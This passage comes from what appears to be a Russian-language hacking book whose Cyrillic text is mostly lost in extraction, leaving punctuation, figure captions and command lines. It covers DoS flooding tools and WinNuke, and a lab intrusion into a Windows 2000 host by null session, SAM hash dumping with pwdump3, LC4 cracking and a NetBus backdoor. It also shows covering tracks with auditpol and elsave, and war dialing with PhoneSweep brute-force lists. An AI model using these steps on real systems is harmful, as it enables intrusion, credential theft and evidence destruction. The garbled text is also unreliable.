, .


9. DoS attacks
, TCP/IP, TCP/IP , . , , - ,

DoS (Denial of Service ). DoS -, TCP/IP .
DoS , . DoS ,
, Yahoo, eBay, CNN.com, www.Microsoft.com,
, [3].
,
- , , , .
DoS ,
,
, , .
, [3], DoS
, . , , , , DoS Web-; , DoS
. ,
, - , DoS.
,
DoS ,
. DoS , ,
,
, - - IDS (, BlackICE Defender
(http://blackice.iss.net/)), .


DoS,
, .

'
DoS ,
.
, , DoS .
- ,
, , ( Web- Yahoo).
. , , 1 ( 1544 /), , , 56 / ( ).
- ,
, , .

.
- ,
.
- , ,
.
- , .
,
.
- ,

, .
.
DoS , , .




,
. 1, Web- [3], , . ,
, .
, . , - UDP ICMP.
DoS, , ,
/.
.

, UDP
UDP, . , DoS, UDP Flooder 2.0
Foundstone (http://www.foundstone.com), , - , .
. 9.1 UDP Flooder 2.O.
UDP Flooder 2.0,
DoS 1-3
IP- 1.0.0.5 .
> UDP Flooder 2.O.
IP/hostname (IP/ ) IP- NetBIOS - IP- 1.0.0.5.
> Port () , 80, HTTP-.



Fig. 9.1. UDP Flooder 2.0: IP/hostname 1.0.0.5, Port 80, Max duration (secs) Infinite, Max packets Infinite, Speed (pkts/sec) 250 (Modem > Cable > T1 > LAN), Data: Random 20000 to 30000 bytes (alternatives: Text, From file); Packets sent 903, Seconds elapsed 20.299; Go, Stop.



Speed () LAN, .
Data ()
Random ( ),
.
Sword
>
, ,
20 000 30 000, .
> Go ().
> ,
,
Stop ().
. 9.2

Alex-
, Networking ().
Fig. 9.2. Windows Task Manager, Networking tab, on the attacked computer: Network Utilization 80%, Link Speed 10 Mbps, Processes 39, CPU Usage 22%.

DoS
, -
UDP, 50%
. - ,
LAN Ethernet I DBase.

ICMP
( ) ICMP (Internet Control Message Protocol -
)
UDP. . 9.3 X-Script ICMP
Bomber.
Fig. 9.3. X-Script ICMP Bomber v0.3: Host 1.0.0.5, Packet Size, Number To Send; output lines:
Received 34464 bytes from 1.0.0.5 in 60 msecs
(repeated for every packet sent)


, Host
() IP- ,
Ping (). , Packet Size ( )
, Number to Send ( ) .
-
. . 9.4 ,
Alex-3 ( IP-
, , 1.0.0.5).
ICMP , ICMP (Internet Control Message Protocol - ) TCP/IP, ICMP
. ICMP
,
Web-; ICMP .

Fig. 9.4. Windows Task Manager during the DoS attack: Processes 38, CPU Usage 5%.

Smurf attack
, , ,
DoS ? Smurf, .
, , Smurf
. ECHO () ICMP,
. IP- ,
. , , -
10 , .
, DoS, DDoS (Distributed DoS). DDoS -, .
, ,

DoS . DDoS WinTrinoo (
http://www.bindview.com), , , DDoS Win32. 2000 DDoS
, Web- (, , , WinTrinoo).
- Foundstone , ,
DoS.


DoS, , , , , . , , DoS,

,
. , .
DoS
PortFuck, ( TCP- , ). PortFuck - TCP- , . ,
,
, TCP- ,
, , .
. 9.5 PortFuck.
Fig. 9.5. PortFuck 1.02 PRIVATE BUILD: Host localhost, Port, Reconnect on Disconnect, Delay (MS) 1000, Socks 5; START, Help?; status Ready.

Nuke
Nuke ,
DoS, , , -, .
- , . TCP/IP
ICMP, ICMP .
- -
, .. - ICMP, , ,
. ,
.
- - ,
, , ,
.
Web-, , . Nuke -
.
DoS Nuke , ,
Windows 2000/XP ,
Windows 9x.
Windows 2000/XP,
(, [4]). ,
Windows 9x,
, .
,

.
Nuke - , . ,
Windows Nuke'eM version 1.1, . 9.8.
Nuke , - Alex-2, IP- 1.0.0.4
Windows 95. .
> Address () Windows Nuke'eM version 1.1,
. 9.8, IP-
Alex-2 (Windows 95), Alex-3 (Windows XP) Alex-1 (Windows 2000).
- Add ()
.

\"\ Eort [

Fig. 9.8. Windows Nuke'eM version 1.1: Port, Address list 1.0.0.4, 1.0.0.5, 1.0.0.7; Text: Testing 1 2 3; Delay; Close after execution; Add, Remove, Help, Execute, Done. The window also carries the author's notice that the program was created by Sadikuz for test purposes only.
> Execute (). Windows Nuke'eM version 1.1 (Fig. 9.9).

Fig. 9.9. Windows Nuke'eM - Version 1.1 after Execute (Alex-2): Address 1.0.0.7, Port 139; 1.0.0.4 {Nuked}, 1.0.0.5 {Connect error}, 1.0.0.7 {Connect error}; Text: Testing 1 2 3, Delay 0; status line: Unable to connect to: 1.0.0.7.


> Alex-2, 1-2 Windows.
Windows , . 9.10.
, 1-2 - Nuke. ,
IRC- IP-.
Windows , , , IDS ( BlackICE Defender).



- ICMP- Source Quench ( ), . , ICMP- Destination Unreachable:
Datagram Too Big ( : ).
, ICMP DoS , , , , ,
,
.
, , DoS,
TCP/IP - NetBIOS Sir Dystic, nbname, NBNS IP-
NetBIOS Windows 2000 [4]. nbname, , NetBIOS NetBIOS. TCP/IP - , , , , net send.
, nbname
- , nbname, ,
nbname.


DoS - ,
. ,
, , . , [11] , , DoS, , , Web- .
, Web-. - , DoS.
DDoS - , , , , ,

-. , Foundstone.
,
, .. , 1 , Foundstone .
DDoS, , Foundstone .
Foundstone,
(Robin Keir),
http://www.foundstone.com DDoSPing 2.0,
-. ,
UDP, UDP .
. 9.11 DDosPing 2.0, .
Fig. 9.11. DDoSPing 2.0: Target IP address range (Start IP address 1.0.0.5, End IP address 1.0.0.5); Transmission speed control, Speed (pkts/sec) 181 (Modem > Cable > T1 > LAN); Infected Hosts log: Program started: Sun Feb 16 13:50:48 2003, Waiting 6 seconds for final results..., Program stopped: Sun Feb 16 13:50:54 2003; Status: Current IP 1.0.0.5, Packets sent 3, Time elapsed 00:00:00, Zombies detected 0; Start, Stop, Save List, Configuration.

DDoSPing 2.0 .
> Start IP address ( IP-) End IP-address (
-) IP- .


> Speed () , , LAN.
> , Configuration () . 9.12).

Fig. 9.12. DDoSPing 2.0 Configuration dialog: for each agent type, Enable, Send to UDP port (34555) or Send ICMP ID (668), "Ping" command (e.g. gesundheit!), Expected reply (PONG; sicken\n), Listen on UDP port or Receive ICMP ID; Windows defaults, UNIX defaults; Show UDP transmit errors, Max run duration (secs) 0 (0 = forever), Transmit each packet ... times, After scan ends, wait ... secs for final replies; OK, Cancel.
> , Windows defaults
(Windows ) Unix defaults (Unix ), Windows Unix, .
> , DDoSPing 2.0 , WinTrinoo, ,
- StachelDraht Tribe Flood Network. ,
(. 9.12).
> DDoSPing 2.0 . 9.11 Start () . Infected Hosts ( ).
, -
Zombie Zapper (http://razor.bindview.com/tools/
ZombieZapper__form.shtml), WinTrinoo.
. 9.13 , , ,
DDoSPing 2.O.

Fig. 9.13. Zombie Zapper: Target(s): Specify single IP or class subnet, Target IP, Input IPs...; agent types Trinoo, Trinoo for Windows, TFN, Stacheldraht, Shaft; UDP source 53; Repeats (1-300); Zap, Exit.


DDoSPing 2.0, Zombie Zapper , DDoSPing 2.O.

, , , DoS - , , 1 . , , - ,
, - Web- - .
- , , ,
, ,
. DoS
, -
(-, , )
Web-.
IP- ICMP-!
EDS DP-, , , ,
Web. , - , .
DoS , -
- !

10. Windows 2000/XP
, , - () ,
, - , ( , , [1]).
, , , -
-
. ,
.
?

TCP/IP, . TCP/IP . .
1 ,

. - , , [11].
, , , .
1, ,
- .

TCP/IP
IP- ,
ping
, W2RK (Windows 2000 Resource Pack).
- ICMP (Internet Control Message Protocol -
). . . 10.1 ping Sword-2000.

Command Prompt

Pinging 1.0.0.1 with 32 bytes of data:

Reply from 1.0.0.1: bytes=32 time<1ms TTL=128
Reply from 1.0.0.1: bytes=32 time<1ms TTL=128
Reply from 1.0.0.1: bytes=32 time<1ms TTL=128
Reply from 1.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 1.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Fig. 10.1. Pinging Sword-2000 with ping


,
. ,
, ,
ICMP
. ICMP , , , hping (http://www.hping.org/).
(.. ) ICMP,
,
.

Fig. 10.2. SuperScan 3.0 scanning 1.0.0.1-1.0.0.7: Resolved SWORD-2000; options Resolve hostnames, Only scan responsive pings, Show host responses, Ping only, Every port in list, Ignore IP zero, Ignore IP 255, Extract from file, All selected ports in list, All list ports from, All ports from; results list Active hosts and Open ports.


- ,
, [3].
SuperScan (http://www.foundstone.com),
(. . 10.2).
. 10.2 IP-
1.0.0.1-1.0.0.7. ,
Sword-2000,
- TCP- 139 NetBIOS. ,
- .


, , , . Windows NT/2000/XP -
NetBIOS 139.


Windows NT/2000, .
. Windows NT/2000/XP
.
net use \\1.0.0.1\IPC$ "" /user:""
1.0.0.1 - IP- Sword-2000, IPC$ -
Inter-Process Communication -
( ), ""
, /user:"" .
, , .
, SMB (Server Message
Block - ). ,
.

,
;
.
Alex-3 ( Windows XP)
Sword-2000 ( Windows 2000).
Sword-2000 Alex-3 - , Windows XP
Windows 2000,
, , .

Windows NT/2000/XP. net view nbtstat W2RK. net view .
C:\>net view /domain

SWORD
.
SWORD. , .
C:\>net view /domain:SWORD

\\ALEX-3
\\SWORD-2000
.
Sword-2000 .
nbtstat; . 10.3.
. 10.3 ,
NetBIOS, NetBIOS. ,
<00> , <00>
- . <03> , ,
<03> - , Administrator. MSBROWSE, <1 >
SWORD.



Command Prompt
C:\Documents and Settings\Alex>nbtstat -<option> 1.0.0.1

Node IpAddress: [1.0.0.5] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    SWORD-2000     <00>  UNIQUE      Registered
    SWORD-2000     <20>  UNIQUE      Registered
    SWORD          <00>  GROUP       Registered
    SWORD          <1C>  GROUP       Registered
    SWORD          <1B>  UNIQUE      Registered
    SWORD          <1E>  GROUP       Registered
    SWORD-2000     <03>  UNIQUE      Registered
    SWORD          <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered
    INet~Services  <1C>  GROUP       Registered
    IS~SWORD-2000..<00>  UNIQUE      Registered
    ADMINISTRATOR  <03>  UNIQUE      Registered

    MAC Address = 52-54-AB-14-55-B4

Fig. 10.3. nbtstat


Alex-3
, , - Administrator. Sword-2000 ? net view,
. . 10.4.
Fig. 10.4. nbtstat output for Sword-2000: Node IpAddress: [1.0.0.5], NetBIOS Remote Machine Name Table with the same entries as in Fig. 10.3 (SWORD-2000, SWORD, __MSBROWSE__, INet~Services, IS~SWORD-2000, ADMINISTRATOR; all Registered), MAC Address = 52-54-AB-14-55-B4.


, Administrator
Sword-2000 CD-ROM. , -
NetBIOS, Administrator,
7, 9, 13, 17, 139, 443, 1025, 1027 , :.
Administrator - : .

, pwdump3.exe Windows NT/2000/XP LC4
.
, NetBIOS TCP/IP
( Windows 2000/XP )? , , SNMP (Simple
Network Management Protocol - ), Windows NT/2000/XP. , SNMP, , , [11].
, , ,
.


Windows NT/2000/XP .
, .
,
, , .
- , ..


, . nbtstat MIB,
- , (. [3] [4]). ,
, . ,
.
D:\>net use \\1.0.0.1\IPC$ * /u:Administrator
* ,
IPC$ Administrator.
:
Type password for \\1.0.0.1\IPC$:
. ,


, , ,
. , , , SMBGrind, CyberCop Scanner Network Associates. (
[3]).
- .
, , , .
Windows NT/2000/XP , SAM (Security Account Manager - ). SAM
(, , ) ,
, ,
. ,
- , , , , .
,
SAM, LC4 ( LOphtcrack,
- LC4) (http://www.atstake.com/research/redirect.html), .
Samdump - SAM.
Pwdump - , . Syskey SAM ( Syskey, Chapter 2).
Pwdump2 - , Syskey.
.
Pwdump3 - , Pwdump2, .
Syskey, 2; ,
SAM,
Windows 2000/XP , Windows NT
.
2 , , , .
Sword-2000
Pwdump3, :
C:\>pwdump3 sword-2000 > password.psw

Sword-2000,
password.psw.

(Notepad) (. 10.5).
Fig. 10.5. password.psw (pwdump3 output for Sword-2000) opened in Notepad: one line per account in the form user:RID:LM hash:NT hash::: for Administrator:500, Guest:501, krbtgt:502, Alex:1110, Alex-1:1113, TsInternetUser:1114, IUSR_SWORD-2000:1115, IWAM_SWORD-2000:1116, SWORD-2000$:1005, ALEX-3$:1109 and ALEX-1$:1112 (Guest, krbtgt and the machine accounts show NO PASSWORD in the LM field).
, password.psw Administrator,
. , LC4, , ,
Sword-2000 (. 10.6).

Fig. 10.6. LC4 cracking the Sword-2000 hashes: accounts Administrator, Guest, krbtgt, Alex, Alex-1, TsInternetUser, IUSR_SWORD-2000, IWAM_SWORD-2000, SWORD-2000$, ALEX-3$, ALEX-1$ (some marked * missing *); Dictionary 1 of 1 [\\Alex-3\@stake\LC4\words-english.dic].
Celeron 1000 , 007
.


,
LC4.
, , -
NetBIOS - , , .
, .


, - ,
, . -
, .
- ,
. , .
Invisible Key Logger Stealth (IKS) (http://www.amecisco.com/iksnt.htm),
3 . IKS -
,
.
- , ..,
, NetBus (http://www.netbus.org)
2 (Back Orifice 2000) (http://www.bo2k.com),
.
NetBus 2 - [3].
,
. ,
, , . - ,
, -
, ,
.
,
NetBus, cDc (Cult of the Dead
Cow - ).

NetBus - , ..
, , , ,
, . ,
, . - ,
. , ,
- , .
NetBus
: -
Sword-2000 (- 1.0.0.1), -
Alex-3 (IP- 1.0.0.5).
.

NetBus
, NBSvr (
).
NBSvr , . 10.7.

Fig. 10.7. NetBus server (NBSvr) window: Settings, Close.

NetBus NBSvr .
.
> NB Server ( NB) Settings ().
Server Setup ( ), . 10.8.

Fig. 10.8. NetBus Server setup dialog: Accept connections; Run on port; Password; Visibility of server: Fully visible; Access mode: Full access; Autostart every Windows session; Log communication; OK, Cancel.


> Accept connections ( ).


> Password () NetBus.
> Visibility of server ( )
Full visible ( ),
NetBus ( ).
> Access mode ( ) Full access ( ), Sword-2000 .
> Autostart every Windows session ( Windows),
.
> . .
- NetBus.exe.
> NetBus.exe, NetBus 2.0 Pro,
. 10.9.

Fig. 10.9. NetBus
Host Neighborhood * Local ( *
). Network (), . 10.10.
Microsoft Windows (Microsoft Windows Network)
(. 10.11).
NetBus,
Sword-2000, Add (). Add Host ( ), . 10.12.

Fig. 10.10. NetBus Network dialog: Network neighbourhood, Add..., Close.
Fig. 10.11. Network neighbourhood: Microsoft Windows (Microsoft Windows Network), Add..., Close.
Fig. 10.12. NetBus Add Host dialog: Destination SWORD-2000, Host name/IP 1.0.0.1, TCP-port 20034, User name Administrator, Password; OK, Cancel.


Host ( /IP) IP- 1.0.0.1.
User name ( ) Administrator, Password () -
LC4 007.
. Network ().
Network (), Close ().
NetBus 2.0 Pro
(. 10.13).
Sword-2000,
Sword-2000 Connect ().
NetBus 2.0 Pro Connected to 1.0.0.1 (v.2.0)
( 1.0.0.1 (v.2.0)).



Fig. 10.13. NetBus 2.0 Pro main window: Destination SWORD-2000, Host; My computer: Cannot connect to 127.0.0.1.


NetBus , NetBus,
. ,
Administrator. . 10.14 NetBus, Control ().

Fig. 10.14. NetBus Control menu: Message manager, File manager, Window manager, Registry manager, Sound system, Plugin manager, Port redirect, Application redirect, Remote control, File actions, Spy functions, Exit Windows.



, Spy functions
( ) , , , , . ,
, ,
, .

! Sword-2000,
Windows,
.
, NetBus,
IKS,
. IIS (Chapter 8), ,
. (
).


, ,
, -
, .
, / .
, . ,
, auditpol.exe W2RK. ( ) ,
.
.
C:\Auditpol>auditpol \\sword-2000 /disable
:
Running ...
Audit information changed successfully on \\sword-2000 ...
New audit policy on \\sword-2000 ...
(0) Audit Disabled
System                    = No
Logon                     = No
Object Access             = No
Privilege Use             = No
Process Tracking          = Success and Failure
Policy Change             = No
Account Management        = No
Directory Service Access  = No
Account Logon             = No



\\sword-2000 - , /disable
. auditpol.exe -
, ,
, , .
, auditpol /?,
. ,
/ SAM,
pwdump3.exe
SAM.

Windows 2000/XP,
( , ).
.
> (Start)
(Settings * Control Panel).
>
(Administrative Tools).
>

(Computer Management). .

>

# (System Tools * Event Viewer).

> (Security Log);


.
> (Clear all
Events). (Event Viewer)
.
> (No), . .
. , -
! , -
. ,
.
[3] elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
Windows NT 4,

Windows 2000.
.

C:\els004>elsave -s \\sword-2000 -
-s , -
. , . ( elsave /? ,
).
, -
elsave.exe
,
(Computer Management).
? ( ) W2RK, SAM,
. .

.

- .
, , ,
. Windows
( , , , [7]). Windows, IDS.

, IDS, , IP-
(, BlacklCE Defender). , ,
, -
..


11.


, , . , ,
, (
, ), - , , . ,
- .
- , , .

, ,
, - ,
. -- -
- , ! , , - , , .
, , . , , - , ,
, .
- , -
Login Hacker, , THC-Scan (http://www.infowar.co.uk/thc/) ToneLock
Minor Threat&Mucho Maas.
, DOS,
.
, (
) - PhoneSweep
(http://www.sandstorm.com) Sandstorm. ,
, ,


, . PhoneSweep,
- , Sandstorm.
- PhoneSweep , , .
, PhoneSweep, , , , - , . , , , ,
, , ,
. - , , ,
.


- , . , ,
. , . Whols (, http://www.ripe.net). Whols , , , - .
- -
.
, ,
.
,
, . , ,
- ,
, .
- -



, , ,
.

, - . , PhoneSweep
,

(, ).

PhoneSweep .
PhoneSweep - , .
, - .
-
Windows.
PhoneSweep . PhoneSweep .
Windows 95/98/NT/2000/XP.
.

/
(Point-to-Point protocol - ).
.
, 1 4.
, .
PhoneSweep.

PhoneSweep
PhoneSweep Demo , -.
(. 11.1).
Fig. 11.1. PhoneSweep Demo start-up dialog: the demonstration notice (the demo version will NOT actually test computer system security on telephone networks) followed by the Sandstorm Enterprises End User License Agreement; Accept, Decline, Copy to Clipboard; Load Profile: New, Current, Select From List.


> Default ( ),
Current () I Accept ( ). PhoneSweep 4.4 Demo, . 11.2.
PhoneSweep 4.4 Demo
File (), View () Help (). ,
. , .
PhoneSweep 4.4 Demo
PhoneNumbers ( ), Results (), Status (),
History () Setup (). , .

Fig. 11.2. PhoneSweep 4.4 Demo main window (localhost - DEFAULT): menu File, View, Help; toolbar Start, Stop, Rescan, Save, Revert, Default, Import, Export, Report, Graph, Dist, What's this?; tabs Phone Numbers, Results, Status, History, Setup; Phone Numbers columns Prefix, Number, Time, Modem, Result, System ID, User ID (entry 555-00); Add.



PhoneSweep 4.4 Demo
.

(. ).
PhoneSweep 4.4 Demo , . , . , PhoneSweep ,
/ , , , , .
, PhoneSweep .


, (
).
Start (). ; Start (), ,
. 11.3, . , Default ,

Setup ().
Fig. 11.3. PhoneSweep 4.4 Demo - localhost - DEFAULT, Start button menu: Start Now, Schedule Start..., Cancel Scheduled Start, Schedule Stop..., Cancel Scheduled Stop.
Stop (). .
Stop () ,
.
Rescan ( ).
, .
PhoneSweep Demo - New Profile (PhoneSweep Demo - ),
. 11.4.

Fig. 11.4. PhoneSweep Demo - New Profile dialog: profile name (DEFAULT), OK, Cancel.
Save (). ,
.



Revert (). ,
, .
Default ( ). .
Import ().
/ bruteforce.txt.
Export (). ( ),
.
Report (). , , .
Graph ().
( Excel 2000).
What's This? ( ). ,
PhoneSweep 4.4 Demo - .


PhoneSweep 4.4 Demo

(. 11.5) ,
.
, Profiles
(), Setup (), . 11.3.
Open (). .
^ Profiles () . 11.5.
New profile ( ). . Profiles () . 11.5.
Copy profile ( ).
( ).
Profiles () . 11.5.

Fig. 11.5. Setup tab, Profiles page: profile list, profile note ("This is a demonstration profile for PhoneSweep 4.0 Demo. Click in this box to edit this note, or click on "New" to create a new profile."), buttons Open, New, Copy, Delete.
Delete (). .
Profiles () . 11.5.
Save (). ,
, . Profiles ()
. 11.5.
Undo (). . Profiles ()
. 11.5.
Freeze (). History
() .
Freeze () Thaw (). Freeze ()
History () . 11.6.
Thaw (). History ().
History () . 11.6.
Clear (). . History () Phone Numbers (
) . 11.6.

Fig. 11.6. History tab: columns Modem, Number, System ID, Result, User ID; entries for 555-2003 and 555-2004 (2003-03-20 11:47, 2003-03-20 11:16); Freeze, Clear; status Idle.



Add (). . Phone Numbers ( ) . 11.3. Clear () Add () Add Phone Numbers ( ), . 11.7
Add ().
Fig. 11.7. PhoneSweep 4.4 Demo - Add Phone Numbers dialog: From, To, Note; time periods Business, Outside, Weekend, All; Each Time Period / Any Time Period.
Delete ().
.
Add/Save (/).
, Add Phone Numbers ( ).



PhoneSweep
. ,
. ,
,
.
Sweeping Indicator ( ) - ,
.
Scheduled Start On/Off ( /) - ,
( ,
).
Scheduled Start Time ( ) - OFF.
Scheduled Stop On/Off ( /) - ,
( ,
).
Scheduled Stop Time ( ) - OFF.
Effort level ( ) - - , , .
Phonenumbers to Dial ( ) - , . , .
Report Status ( ) - ,
, ; - ;
- .
Time Period ( ) - - , , .
Remote Access Indicator ( ) - , PhoneSweep
. , .
-
PhoneSweep , .

Working with PhoneSweep
PhoneSweep, .
> PhoneSweep Setup (), . 11.5 .
> Phone Numbers ( ),
. 11.2, , Add (), Add
Phone Numbers ( ), . 11.7,
.
> PhoneSweep Start ()
.
, ,
(dialing riles).

PhoneSweep , ,
.
PhoneSweep, , , , -
.
, PhoneSweep
.


.
Add Phone Numbers ( ) (. 11.7)
: Business (), Outside (), Weekend
().
PhoneSweep ,
, , , .



Time (), Setup (), . 11.8.
Fig. 11.8. Setup tab, Time page: Business Hours and Blackout Hours (Start Hrs/Minutes, End Hrs/Minutes); Weekends: Monday ... Sunday (Saturday and Sunday checked); Import Time Periods: Business, Outside, Weekend; Delay Between Calls: 3 Seconds; Time Period / Rings / Seconds: Business 4 or 50, Outside 10 or 92, Weekend 10 or 92.

Business Hours ( ) Blackout Hours ( )


, , , , .
Weekends () ( ). Import Time
Period ( ) , .
Time () Rings
() Seconds (), , , , .
Business ( ), Outside ( ) Weekend
(). , . 11.8 , 10 , 92 .
, Time ()
, .
?
- Effort ().


Effort () . 11.9.
Fig. 11.9. Setup tab, Effort page: Current Effort Level (Connect to answering phone numbers then disconnect immediately); Set Level: Connect; Scan For: Modems Only; Penetrate Level Options: Maximum Guesses Per Username Per Day, Maximum Calls Per Number Per Day, Recycle Names, Find Modems First; Username/Password list (root, guess, ...).
. 11.9, ,
. Set Level ( ) ,
( Connect ()),
( Identity
()), (
Penetrate ()). Scan For () / ,
(, , , ?).
Penetrate Level Options ( )
, ..
. Maximum Guesses Per Username Per Day ( )
() . , ,
- . ,
,



Maximum Calls
Per Number Per Day ( ).
/, ,
bruteforce.txt,
Effort (), . 11.9. , Add () Del ().
/
Recycle Names ( ). Recycle Names (
) PhoneSweep
/ ,
/.
, Find Modems First ( ) PhoneSweep
.
.
PhoneSweep , /. .
bruteforce.txt: /,
PhoneSweep . brutecreate.exe,
/ bruteforce.txt.
systemdefault.txt: /,
.
( )
bruteforce.txt.
largebrute.txt: ,
.
largebruteback.txt: ,
largebrute.txt, .
, PhoneSweep ,
. - ! , ,
, PhoneSweep 1000$, ,
2800$ 2002 , - PhoneSweep . ! - , , -


, PhoneSweep - ,
, .
- THC-Scan ToneLock
,
. , - Login Hacker (
, , [3]). ,
, ...
- -
.
, , TeleSweep Secure
(http://www.securelogix.com) Secure Logix. However, [14], TeleSweep Secure
- , .

, , - .
-
.
, , , - ,
.
PhoneSweep -
, ,
, , . PhoneSweep
, , - .

, , , .



1. 2000-2003 .
2.

.. - .: -, 2001. - 624 .: .

3.

- ., ., . . , 2- .: . . - .: ,
2001.- 656 .: . - . . .

4. - ., ., . . Windows
2000 - .; . . - .: ,
2002.- 264 .: . - . . .
5.

. .
. - 560 . - .: ,
2002.- ( ).

6. . . Windows 2000.:
Windows 2000.: . . - .: , 2001. - 592
.: . - . . .
7.

Alex JeDaev . - .:
, 2002 - 432 .: .

8.

. . (+CD). .:, 2002. - 864 .: .

9.

.. .: . . - .: +, .:
, .: -, 2001.- 272 .

10. . .
- .: ,
2000. - 736 .
11. ., . . Web- .; . . - .: , 2003.384 .: . - . . .
12. . , . .
- .: . 2002. - 848 .: .
13. - , .
14. - ., ., . . , 3- .: . . - .: ,
2002.- 736 .: . - . . .

